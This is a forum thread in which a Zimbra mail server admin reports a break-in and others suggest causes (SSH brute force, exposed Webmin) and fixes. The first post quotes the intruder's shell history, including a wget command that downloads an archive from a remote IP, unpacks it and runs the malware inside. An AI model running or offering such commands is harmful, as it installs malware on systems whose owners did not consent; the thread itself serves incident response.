Results 1 to 10 of 10

Thread: Zimbra Server compromised

  1. #1
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default Zimbra Server compromised

    Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

    This was in the .bash_history

    id
    uname -a
    ls -a
    cat .bash_history
    cd /tmp
    ls -a
    wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar[/url] -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
    cd ..
    ls -a
    cd ..
    rm -rf .m
    ps x
    kill -9 12150
    exit

    So the zmback cron was removed. It's an ubuntu 8.04 server, kept up to date with apt. Apart from zimbra, the only other thing installed is Webmin which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential zimbra services (secure imap, ssl smpt etc).

    Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

    I've altered the URL shown to as to stop people clicking on it.

    sem

  2. #2
    Join Date
    May 2006
    Location
    England.
    Posts
    927
    Rep Power
    10

    Default

    Can you rule out physical access?

  3. #3
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default

    Quote Originally Posted by Dirk View Post
    Can you rule out physical access?
    Not 100% to be honest. The server is in a server room that is normally locked. I'm the only one that knows the root password.

    Up until this morning, other than the afforementioned zimbra ports and ssh, only webmin was available - I've since closed these ports off too.

  4. #4
    Join Date
    Sep 2005
    Location
    Sydney, Australia
    Posts
    291
    Rep Power
    10

    Default

    odds on, you had a weak password on an account and it was a simple brute force ssh attack.
    http://www.solutionsfirst.com.au/hosting/zimbra/
    Australia's premier Zimbra Hosting Partner
    Resellers wanted!

  5. #5
    Join Date
    May 2006
    Location
    England.
    Posts
    927
    Rep Power
    10

    Default

    Are there any signs of bruteforcing the ssh password?
    Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

    I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.

  6. #6
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default

    Quote Originally Posted by dave_kempe View Post
    odds on, you had a weak password on an account and it was a simple brute force ssh attack.
    Unlikely - I'm not an expert but port 22 on the router is port forwarded to another linux machine - you then open an ssh session to the zimbra box. I've checked this one and it's not been compromised at all. that's the only ssh route to the zimbra box.

  7. #7
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default

    Quote Originally Posted by Dirk View Post
    Are there any signs of bruteforcing the ssh password?
    Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

    I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.
    Not on the zimbra server - outside of the network, you can't directly ssh to it.

  8. #8
    Join Date
    Sep 2006
    Location
    477 Congress Street | Portland, ME 04101
    Posts
    1,374
    Rep Power
    11

    Default

    Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

    If you also had Webmin open on your Desktop and went to another web site with an infected ad, that could also be the attack vector. See Webmin for example.

    If the root account on your Zimbra server has been compromised, just changing the root password is likely not sufficient for eliminating the exposure.

    I'd strongly suggest engaging a professional security firm for an assessment.

    Hope that helps,
    Mark

  9. #9
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default

    Quote Originally Posted by LMStone View Post
    Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

    Hope that helps,
    Mark
    Hi - thanks for the advice. I've used webmin to varying extents for years - the version on the zimbra box is the latest. it's not really used and doesn't have 100% access from the Internet - it was also not operatiing on the standard webmin port.

    i've disabled access to the root account and changed the password on the sole user account. I've checked again and the only thing compromised was the cron job - it looks like the virus was unable to propagate itself.

    I'm getting someone to take a look at it tonight though.
    Last edited by sem; 07-22-2010 at 08:45 AM.

  10. #10
    Join Date
    Dec 2009
    Posts
    29
    Rep Power
    5

    Default

    As an update I've shut off all access from the internet beyond what zimbra requires to handle mail. vigilance ensues.

Similar Threads

  1. Recover the mail after the crash HDD
    By MrSnaKe in forum Administrators
    Replies: 3
    Last Post: 12-02-2009, 04:38 AM
  2. [SOLVED] Moving Zimbra to a new server
    By krolen in forum Administrators
    Replies: 109
    Last Post: 02-05-2009, 11:38 AM
  3. Error after installation
    By robsontuxlinux in forum Installation
    Replies: 13
    Last Post: 09-11-2008, 10:48 PM
  4. My Zimbra Server crashed this morning...
    By glitch23 in forum Administrators
    Replies: 3
    Last Post: 04-07-2008, 02:28 PM
  5. 3.1 on FC4 problems
    By cohnhead in forum Installation
    Replies: 8
    Last Post: 05-26-2006, 12:16 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •